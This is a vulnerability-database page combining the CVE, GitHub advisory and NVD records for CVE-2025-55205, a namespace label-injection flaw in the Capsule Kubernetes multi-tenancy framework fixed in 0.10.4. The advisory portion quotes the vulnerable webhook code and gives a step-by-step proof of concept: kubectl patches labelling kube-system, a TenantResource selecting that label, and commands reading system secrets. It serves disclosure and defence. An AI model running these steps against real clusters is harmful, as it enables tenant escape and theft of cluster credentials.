cvelistv5 - CVE-2025-55205

CVE-2025-55205 (GCVE-0-2025-55205)

Vulnerability from cvelistv5 – Published: 2025-08-18 16:28 – Updated: 2025-08-18 17:39

Summary

Capsule is a multi-tenancy and policy-based framework for Kubernetes. A namespace label injection vulnerability in Capsule v0.10.3 and earlier allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce. This vulnerability is fixed in 0.10.4.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-863 - Incorrect Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/projectcapsule/capsule/securit…	x_refsource_CONFIRM
	https://github.com/projectcapsule/capsule/commit/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	projectcapsule	capsule	Affected: < 0.10.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55205",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-18T17:38:26.098994Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-18T17:39:07.476Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "capsule",
          "vendor": "projectcapsule",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.10.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Capsule is a multi-tenancy and policy-based framework for Kubernetes. A namespace label injection vulnerability in Capsule v0.10.3 and earlier allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce. This vulnerability is fixed in 0.10.4."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-18T16:28:51.317Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv"
        },
        {
          "name": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e"
        }
      ],
      "source": {
        "advisory": "GHSA-fcpm-6mxq-m5vv",
        "discovery": "UNKNOWN"
      },
      "title": "Capsule tenant owners with \"patch namespace\" permission can hijack system namespaces label"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55205",
    "datePublished": "2025-08-18T16:28:51.317Z",
    "dateReserved": "2025-08-08T21:55:07.966Z",
    "dateUpdated": "2025-08-18T17:39:07.476Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55205\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-18T17:15:30.117\",\"lastModified\":\"2025-08-18T20:16:28.750\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Capsule is a multi-tenancy and policy-based framework for Kubernetes. A namespace label injection vulnerability in Capsule v0.10.3 and earlier allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce. This vulnerability is fixed in 0.10.4.\"},{\"lang\":\"es\",\"value\":\"Capsule es un marco multiinquilino basado en pol\u00edticas para Kubernetes. Una vulnerabilidad de inyecci\u00f3n de etiquetas en espacios de nombres en Capsule v0.10.3 y versiones anteriores permite a los usuarios autenticados inyectar etiquetas arbitrarias en los espacios de nombres del sistema (kube-system, default, capsule-system), omitiendo el aislamiento multiinquilino y potencialmente accediendo a recursos entre inquilinos mediante selectores TenantResource. Esta vulnerabilidad permite la escalada de privilegios y viola los l\u00edmites de seguridad fundamentales que Capsule est\u00e1 dise\u00f1ado para aplicar. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 0.10.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"references\":[{\"url\":\"https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55205\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-18T17:38:26.098994Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-18T17:39:02.682Z\"}}], \"cna\": {\"title\": \"Capsule tenant owners with \\\"patch namespace\\\" permission can hijack system namespaces label\", \"source\": {\"advisory\": \"GHSA-fcpm-6mxq-m5vv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"projectcapsule\", \"product\": \"capsule\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.10.4\"}]}], \"references\": [{\"url\": \"https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv\", \"name\": \"https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e\", \"name\": \"https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Capsule is a multi-tenancy and policy-based framework for Kubernetes. A namespace label injection vulnerability in Capsule v0.10.3 and earlier allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce. This vulnerability is fixed in 0.10.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863: Incorrect Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-18T16:28:51.317Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55205\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-18T17:39:07.476Z\", \"dateReserved\": \"2025-08-08T21:55:07.966Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-18T16:28:51.317Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-FCPM-6MXQ-M5VV

Vulnerability from github – Published: 2025-08-18 21:00 – Updated: 2025-08-29 20:35

Summary

Capsule tenant owners with "patch namespace" permission can hijack system namespaces label

Details

Summary

A namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.

Details

The vulnerability exists in the namespace validation webhook logic located in pkg/webhook/namespace/validation/patch.go:60-77. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:

if label, ok := ns.Labels[ln]; ok {
    // Only checks permissions when namespace has tenant label
    if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {
        response := admission.Denied(e)
        return &response
    }
}

return nil  // Critical issue: allows operation if no tenant label exists

Root Cause Analysis: 1. Missing Default Protection: System namespaces (kube-system, default, capsule-system) do not have the capsule.clastix.io/tenant label by default 2. Bypass Logic: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant 3. Unrestricted Label Injection: Authenticated users can inject arbitrary labels into unprotected namespaces

Attack Vector Path:

Label Injection (user-controlled) → Namespace Selector (system matching) → TenantResource/Quota Check (authorization bypass) → Cross-tenant Resource Access

This mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation: - CVE-2024-39690: ownerReference(user-controlled) → tenant.Status.Namespaces(system state) → quota/permission check(auth policy) → namespace hijacking - This vulnerability: Label injection(user-controlled) → Namespace selector(system matching) → TenantResource/Quota check(auth policy) → cross-tenant resource access

PoC

Prerequisites: - Minikube cluster with Capsule v0.10.3 installed - Authenticated tenant user with basic RBAC permissions

Step 1: Environment Setup

# Install Minikube and Capsule
minikube start
helm repo add projectcapsule https://projectcapsule.github.io/charts
helm install capsule projectcapsule/capsule -n capsule-system --create-namespace

# Create tenant and user
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF

# Create user certificate and kubeconfig (using provided script)
./create-user-minikube.sh alice tenant1

Step 2: Label Injection Attack

# Switch to attacker context
export KUBECONFIG=alice-tenant1.kubeconfig

# Inject malicious labels into system namespaces
kubectl patch namespace kube-system --type='json' -p='[
  {
    "op": "add",
    "path": "/metadata/labels/malicious-label",
    "value": "attack-value"
  }
]'

# Verify injection success
kubectl get namespace kube-system --show-labels

Step 3: Exploitation via TenantResource

# Create attacker-controlled namespace
kubectl create namespace alice-attack

# Create malicious TenantResource targeting injected labels
cat <<EOF | kubectl apply -f -
apiVersion: capsule.clastix.io/v1beta2
kind: TenantResource
metadata:
  name: malicious-resource
  namespace: alice-attack
spec:
  resyncPeriod: 60s
  resources:
  - namespaceSelector:
      matchLabels:
        malicious-label: "attack-value"
EOF

# Verify cross-tenant access
kubectl get tenantresource -n alice-attack malicious-resource -o yaml

Step 4: Verification of Impact

# Check if system namespace resources are now accessible
export KUBECONFIG=~/.kube/config
kubectl get namespaces -l "malicious-label=attack-value"
# Output shows: kube-system (and potentially other injected namespaces)

# Check for potential resource replication/access
kubectl get all -n kube-system
kubectl get secrets -n kube-system
kubectl get configmaps -n kube-system

Automated Testing Script: A complete vulnerability verification script is available that tests: - Label injection into multiple system namespaces - TenantResource exploitation - Cross-tenant resource access verification - Impact assessment and cleanup

Impact

Vulnerability Type: Authorization Bypass / Privilege Escalation

Who is Impacted: - Multi-tenant Kubernetes clusters using Capsule v0.10.3 and potentially earlier versions - Organizations relying on Capsule for tenant isolation and resource governance - Cloud service providers offering Kubernetes-as-a-Service with Capsule-based multi-tenancy

Security Impact: 1. Multi-tenant Isolation Bypass: Attackers can access resources from other tenants or system namespaces 2. Privilege Escalation: Tenant users can gain access to cluster-wide resources and sensitive system components 3. Data Exfiltration: Potential access to secrets, configmaps, and other sensitive data in system namespaces 4. Resource Quota Bypass: Ability to consume resources outside assigned tenant boundaries 5. Policy Circumvention: Bypass network policies, security policies, and other tenant-level restrictions

Real-world Exploitation Scenarios: - Access to kube-system secrets containing cluster certificates and service account tokens - Modification or replication of critical system configurations - Cross-tenant data access in shared clusters - Potential cluster-wide compromise through system namespace access

Severity: High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.

Severity ?

9.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectcapsule/capsule"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55205"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-18T21:00:36Z",
    "nvd_published_at": "2025-08-18T17:15:30Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.\n\n### Details\nThe vulnerability exists in the namespace validation webhook logic located in `pkg/webhook/namespace/validation/patch.go:60-77`. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:\n\n```go\nif label, ok := ns.Labels[ln]; ok {\n    // Only checks permissions when namespace has tenant label\n    if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {\n        response := admission.Denied(e)\n        return \u0026response\n    }\n}\n\nreturn nil  // Critical issue: allows operation if no tenant label exists\n```\n\n**Root Cause Analysis:**\n1. **Missing Default Protection**: System namespaces (kube-system, default, capsule-system) do not have the `capsule.clastix.io/tenant` label by default\n2. **Bypass Logic**: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant\n3. **Unrestricted Label Injection**: Authenticated users can inject arbitrary labels into unprotected namespaces\n\n**Attack Vector Path:**\n```\nLabel Injection (user-controlled) \u2192 Namespace Selector (system matching) \u2192 TenantResource/Quota Check (authorization bypass) \u2192 Cross-tenant Resource Access\n```\n\nThis mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation:\n- **CVE-2024-39690**: `ownerReference(user-controlled) \u2192 tenant.Status.Namespaces(system state) \u2192 quota/permission check(auth policy) \u2192 namespace hijacking`\n- **This vulnerability**: `Label injection(user-controlled) \u2192 Namespace selector(system matching) \u2192 TenantResource/Quota check(auth policy) \u2192 cross-tenant resource access`\n\n### PoC\n**Prerequisites:**\n- Minikube cluster with Capsule v0.10.3 installed\n- Authenticated tenant user with basic RBAC permissions\n\n**Step 1: Environment Setup**\n```bash\n# Install Minikube and Capsule\nminikube start\nhelm repo add projectcapsule https://projectcapsule.github.io/charts\nhelm install capsule projectcapsule/capsule -n capsule-system --create-namespace\n\n# Create tenant and user\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n  name: tenant1\nspec:\n  owners:\n  - name: alice\n    kind: User\nEOF\n\n# Create user certificate and kubeconfig (using provided script)\n./create-user-minikube.sh alice tenant1\n```\n\n**Step 2: Label Injection Attack**\n```bash\n# Switch to attacker context\nexport KUBECONFIG=alice-tenant1.kubeconfig\n\n# Inject malicious labels into system namespaces\nkubectl patch namespace kube-system --type=\u0027json\u0027 -p=\u0027[\n  {\n    \"op\": \"add\",\n    \"path\": \"/metadata/labels/malicious-label\",\n    \"value\": \"attack-value\"\n  }\n]\u0027\n\n# Verify injection success\nkubectl get namespace kube-system --show-labels\n```\n\n**Step 3: Exploitation via TenantResource**\n```bash\n# Create attacker-controlled namespace\nkubectl create namespace alice-attack\n\n# Create malicious TenantResource targeting injected labels\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: capsule.clastix.io/v1beta2\nkind: TenantResource\nmetadata:\n  name: malicious-resource\n  namespace: alice-attack\nspec:\n  resyncPeriod: 60s\n  resources:\n  - namespaceSelector:\n      matchLabels:\n        malicious-label: \"attack-value\"\nEOF\n\n# Verify cross-tenant access\nkubectl get tenantresource -n alice-attack malicious-resource -o yaml\n```\n\n**Step 4: Verification of Impact**\n```bash\n# Check if system namespace resources are now accessible\nexport KUBECONFIG=~/.kube/config\nkubectl get namespaces -l \"malicious-label=attack-value\"\n# Output shows: kube-system (and potentially other injected namespaces)\n\n# Check for potential resource replication/access\nkubectl get all -n kube-system\nkubectl get secrets -n kube-system\nkubectl get configmaps -n kube-system\n```\n\n**Automated Testing Script:**\nA complete vulnerability verification script is available that tests:\n- Label injection into multiple system namespaces\n- TenantResource exploitation\n- Cross-tenant resource access verification\n- Impact assessment and cleanup\n\n### Impact\n**Vulnerability Type:** Authorization Bypass / Privilege Escalation\n\n**Who is Impacted:**\n- **Multi-tenant Kubernetes clusters** using Capsule v0.10.3 and potentially earlier versions\n- **Organizations relying on Capsule** for tenant isolation and resource governance\n- **Cloud service providers** offering Kubernetes-as-a-Service with Capsule-based multi-tenancy\n\n**Security Impact:**\n1. **Multi-tenant Isolation Bypass**: Attackers can access resources from other tenants or system namespaces\n2. **Privilege Escalation**: Tenant users can gain access to cluster-wide resources and sensitive system components\n3. **Data Exfiltration**: Potential access to secrets, configmaps, and other sensitive data in system namespaces\n4. **Resource Quota Bypass**: Ability to consume resources outside assigned tenant boundaries\n5. **Policy Circumvention**: Bypass network policies, security policies, and other tenant-level restrictions\n\n**Real-world Exploitation Scenarios:**\n- Access to kube-system secrets containing cluster certificates and service account tokens\n- Modification or replication of critical system configurations\n- Cross-tenant data access in shared clusters\n- Potential cluster-wide compromise through system namespace access\n\n**Severity:** High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.",
  "id": "GHSA-fcpm-6mxq-m5vv",
  "modified": "2025-08-29T20:35:24Z",
  "published": "2025-08-18T21:00:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55205"
    },
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectcapsule/capsule"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3893"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Capsule tenant owners with \"patch namespace\" permission can hijack system namespaces label"
}

FKIE_CVE-2025-55205

Vulnerability from fkie_nvd - Published: 2025-08-18 17:15 - Updated: 2025-08-18 20:16

Severity ?

9.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e
	security-advisories@github.com	https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Capsule is a multi-tenancy and policy-based framework for Kubernetes. A namespace label injection vulnerability in Capsule v0.10.3 and earlier allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce. This vulnerability is fixed in 0.10.4."
    },
    {
      "lang": "es",
      "value": "Capsule es un marco multiinquilino basado en pol\u00edticas para Kubernetes. Una vulnerabilidad de inyecci\u00f3n de etiquetas en espacios de nombres en Capsule v0.10.3 y versiones anteriores permite a los usuarios autenticados inyectar etiquetas arbitrarias en los espacios de nombres del sistema (kube-system, default, capsule-system), omitiendo el aislamiento multiinquilino y potencialmente accediendo a recursos entre inquilinos mediante selectores TenantResource. Esta vulnerabilidad permite la escalada de privilegios y viola los l\u00edmites de seguridad fundamentales que Capsule est\u00e1 dise\u00f1ado para aplicar. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 0.10.4."
    }
  ],
  "id": "CVE-2025-55205",
  "lastModified": "2025-08-18T20:16:28.750",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-18T17:15:30.117",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-55205 (GCVE-0-2025-55205)

GHSA-FCPM-6MXQ-M5VV

Summary

Details

PoC

Impact

FKIE_CVE-2025-55205

Tags

Sightings

Nomenclature